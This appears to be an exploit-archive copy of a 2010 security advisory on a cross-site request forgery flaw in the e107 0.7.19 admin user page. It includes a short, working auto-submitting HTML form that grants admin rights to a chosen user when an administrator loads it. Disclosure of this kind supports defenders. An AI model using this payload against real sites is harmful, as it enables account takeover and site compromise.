Advertisement






e107 0.7.19 cross site request forgery

CVE Category Price Severity
N/A CWE-352 N/A Medium
Author Risk Exploitation Type Date
Exploit Alert Team Medium Remote 2010-04-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010040132

Below is a copy:

Vulnerability ID: HTB22344
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_e107.html
Product: e107 Website System
Vendor: e107
Vulnerable Version: 0.7.19 and Probably Prior Versions
Vendor Notification: 05 April 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the /e107_admin/users.php script to properly verify the source of HTTP request. 

Successful exploitation of this vulnerability could result in a compromise of the application, disclosure or modification of sensitive data. 

Attacker can use browser to exploit this vulnerability. The following PoC is available: 


<form method=POST action=http://host/e107_admin/users.php name=main>
<input type=hidden name=userid value=2>
<input type=hidden name=userip value=1.2.3.4>
<input type=hidden name=useraction value=admin>
</form>
<script>
document.main.submit();
</script>



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum